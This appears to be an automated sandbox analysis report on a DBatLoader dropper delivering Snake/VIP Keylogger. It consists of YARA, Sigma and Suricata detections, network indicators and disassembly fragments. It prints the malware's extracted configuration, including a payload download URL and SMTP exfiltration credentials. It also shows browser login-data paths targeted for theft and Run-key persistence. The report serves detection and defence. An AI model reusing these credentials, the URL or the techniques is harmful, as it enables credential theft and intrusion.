12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.jphwmyiA.pif.25350000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
3.2.jphwmyiA.pif.25350000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
Click to see the 270 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\yxU3AgeVTi.exe, ProcessId: 6800, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\jphwmyiA.pif, NewProcessName: C:\Users\Public\Libraries\jphwmyiA.pif, OriginalFileName: C:\Users\Public\Libraries\jphwmyiA.pif, ParentCommandLine: "C:\Users\user\Desktop\yxU3AgeVTi.exe", ParentImage: C:\Users\user\Desktop\yxU3AgeVTi.exe, ParentProcessId: 6800, ParentProcessName: yxU3AgeVTi.exe, ProcessCommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, ProcessId: 340, ProcessName: jphwmyiA.pif

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\yxU3AgeVTi.exe, ProcessId: 6800, TargetFilename: C:\Windows \SysWOW64\svchost.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Aiymwhpj.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\yxU3AgeVTi.exe, ProcessId: 6800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aiymwhpj

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Aiymwhpj.PIF" , ParentImage: C:\Users\Public\Libraries\Aiymwhpj.PIF, ParentProcessId: 1704, ParentProcessName: Aiymwhpj.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 6740, ProcessName: cmd.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.247.73, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\jphwmyiA.pif, Initiated: true, ProcessId: 340, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Aiymwhpj.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\yxU3AgeVTi.exe, ProcessId: 6800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aiymwhpj

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\jphwmyiA.pif, NewProcessName: C:\Users\Public\Libraries\jphwmyiA.pif, OriginalFileName: C:\Users\Public\Libraries\jphwmyiA.pif, ParentCommandLine: "C:\Users\user\Desktop\yxU3AgeVTi.exe", ParentImage: C:\Users\user\Desktop\yxU3AgeVTi.exe, ParentProcessId: 6800, ParentProcessName: yxU3AgeVTi.exe, ProcessCommandLine: C:\Users\Public\Libraries\jphwmyiA.pif, ProcessId: 340, ProcessName: jphwmyiA.pif

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.198.176, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\jphwmyiA.pif, Initiated: true, ProcessId: 340, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49770

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T07:58:05.892354+0100	2803305	3	Unknown Traffic	192.168.2.4	49734	188.114.97.3	443	TCP
2025-01-06T07:58:15.585113+0100	2803305	3	Unknown Traffic	192.168.2.4	49748	188.114.97.3	443	TCP
2025-01-06T07:58:18.640832+0100	2803305	3	Unknown Traffic	192.168.2.4	49758	188.114.97.3	443	TCP
2025-01-06T07:58:21.308292+0100	2803305	3	Unknown Traffic	192.168.2.4	49764	188.114.97.3	443	TCP
2025-01-06T07:58:22.676934+0100	2803305	3	Unknown Traffic	192.168.2.4	49766	188.114.97.3	443	TCP
2025-01-06T07:58:23.983666+0100	2803305	3	Unknown Traffic	192.168.2.4	49769	188.114.97.3	443	TCP
2025-01-06T07:58:25.633125+0100	2803305	3	Unknown Traffic	192.168.2.4	49774	188.114.97.3	443	TCP
2025-01-06T07:58:26.621410+0100	2803305	3	Unknown Traffic	192.168.2.4	49777	188.114.97.3	443	TCP
2025-01-06T07:58:26.923112+0100	2803305	3	Unknown Traffic	192.168.2.4	49778	188.114.97.3	443	TCP
2025-01-06T07:58:27.919444+0100	2803305	3	Unknown Traffic	192.168.2.4	49781	188.114.97.3	443	TCP
2025-01-06T07:58:32.128003+0100	2803305	3	Unknown Traffic	192.168.2.4	49789	188.114.97.3	443	TCP
2025-01-06T07:58:33.543273+0100	2803305	3	Unknown Traffic	192.168.2.4	49791	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T07:58:03.789102+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49732	132.226.247.73	80	TCP
2025-01-06T07:58:05.476678+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49732	132.226.247.73	80	TCP
2025-01-06T07:58:06.679742+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49735	132.226.247.73	80	TCP
2025-01-06T07:58:07.961019+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49737	132.226.247.73	80	TCP
2025-01-06T07:58:09.273655+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49739	132.226.247.73	80	TCP
2025-01-06T07:58:16.770857+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49752	132.226.247.73	80	TCP
2025-01-06T07:58:18.052213+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49752	132.226.247.73	80	TCP
2025-01-06T07:58:19.481027+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49760	132.226.247.73	80	TCP
2025-01-06T07:58:23.645597+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49767	132.226.247.73	80	TCP
2025-01-06T07:58:25.051857+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49767	132.226.247.73	80	TCP
2025-01-06T07:58:26.379982+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49776	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T07:58:16.510336+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49751	149.154.167.220	443	TCP
2025-01-06T07:58:28.807005+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49783	149.154.167.220	443	TCP
2025-01-06T07:58:35.765047+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49794	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: yxU3AgeVTi.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}
Source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}
Source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Aiymwhpj.PIF

ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Source: yxU3AgeVTi.exe	Virustotal: Detection: 34%			Perma Link
Source: yxU3AgeVTi.exe	ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 3.2.jphwmyiA.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 7.2.jphwmyiA.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 12.2.jphwmyiA.pif.400000.1.unpack

Source: yxU3AgeVTi.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49756 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49772 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49787 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49794 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1842885940.0000000021170000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.0000000020694000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1879153226.000000000061A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: yxU3AgeVTi.exe, 00000000.00000003.1680843754.000000007F410000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707383794.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.000000002067A000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1839978550.0000000027EE4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: yxU3AgeVTi.exe, 00000000.00000003.1680843754.000000007F410000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707383794.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681562760.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.0000000021382000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000003.1802890803.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000003.1802890803.0000000000853000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.000000002067A000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1878770387.000000000061A000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1878770387.000000000064B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_029358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_029358B4

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	3_2_2500DC80
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2792F2B5h	3_2_2792F0CB
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2792FC3Fh	3_2_2792F0CB
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_2792E5E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2792E0C5h	3_2_2792E114
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2792E0C5h	3_2_2792DF33
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_2792EDFB
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_2792EC1B
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924B829h	3_2_2924B580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924185Dh	3_2_29241440
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292410E9h	3_2_29240E38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924E7F1h	3_2_2924E548
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924EC49h	3_2_2924E9A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924F0A1h	3_2_2924EDF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924BC81h	3_2_2924B9D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924DAE9h	3_2_2924D840
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924DF41h	3_2_2924DC98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924E399h	3_2_2924E0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924CDE1h	3_2_2924CB38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924FDA9h	3_2_2924FB00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924185Dh	3_2_2924178B
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924D239h	3_2_2924CF90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924D691h	3_2_2924D3E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924C0D9h	3_2_2924BE30
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924F4F9h	3_2_2924F250
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924F951h	3_2_2924F6A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924C531h	3_2_2924C288
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2924C989h	3_2_2924C6E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292568FDh	3_2_292565C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29257DC0h	3_2_29257AF0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29253769h	3_2_292534C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925E9EEh	3_2_2925E720
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925C9FEh	3_2_2925C730
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29255FB9h	3_2_29255D10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29253BC1h	3_2_29253918
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925FC2Eh	3_2_2925F960
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925701Ah	3_2_29256F69
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29256411h	3_2_29256168
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925701Ah	3_2_29256F70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29254019h	3_2_29253D70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925DC3Eh	3_2_2925D970
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925AA0Eh	3_2_2925A740
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29250FF1h	3_2_29250D48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29251449h	3_2_292511A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925EE7Eh	3_2_2925EBB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925BC4Eh	3_2_2925B980
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov esp, ebp	3_2_29259B8A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292518A1h	3_2_292515F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925CE8Eh	3_2_2925CBC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29254471h	3_2_292541C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925AE9Eh	3_2_2925ABD0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292548C9h	3_2_29254620
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925E0CEh	3_2_2925DE00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925C0DEh	3_2_2925BE10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925B32Eh	3_2_2925B060
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29255709h	3_2_29255460
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29253311h	3_2_29253068
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29254D21h	3_2_29254A78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925F30Eh	3_2_2925F040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292502E9h	3_2_29250040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29251CF9h	3_2_29251A50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925D31Eh	3_2_2925D050
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925C56Eh	3_2_2925C2A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29252151h	3_2_29251EA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925A57Eh	3_2_2925A2B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29255B61h	3_2_292558B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925E55Eh	3_2_2925E290
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29250741h	3_2_29250498
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925D7AEh	3_2_2925D4E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29250B99h	3_2_292508F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925B7BEh	3_2_2925B4F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925517Bh	3_2_29254ED0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2925F79Eh	3_2_2925F4D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C5730h	3_2_292C5438
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C1086h	3_2_292C0DB8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C9A20h	3_2_292C9728
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C6F18h	3_2_292C6C20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C3506h	3_2_292C3238
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CF030h	3_2_292CED38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CC528h	3_2_292CC230
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C4BD6h	3_2_292C4908
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C8700h	3_2_292C8408
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C5BF8h	3_2_292C5900
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CF4F9h	3_2_292CF200
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C2BE6h	3_2_292C2918
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CDD10h	3_2_292CDA18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CB208h	3_2_292CAF10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C1E36h	3_2_292C1B68
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CC060h	3_2_292CBD68
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C0C07h	3_2_292C0960
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C9558h	3_2_292C9260
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C4746h	3_2_292C4478
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C7D70h	3_2_292C7A78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CEB68h	3_2_292CE870
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C1516h	3_2_292C1248
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CAD40h	3_2_292CAA48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C030Eh	3_2_292C0040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C8238h	3_2_292C7F40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C3E26h	3_2_292C3B58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C6A50h	3_2_292C6758
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CD848h	3_2_292CD550
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C3076h	3_2_292C2DA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CE6A0h	3_2_292CE3A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CBB98h	3_2_292CB8A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CA3B0h	3_2_292CA0B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C78A8h	3_2_292C75B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C2756h	3_2_292C2488
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CD380h	3_2_292CD088
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CA878h	3_2_292CA580
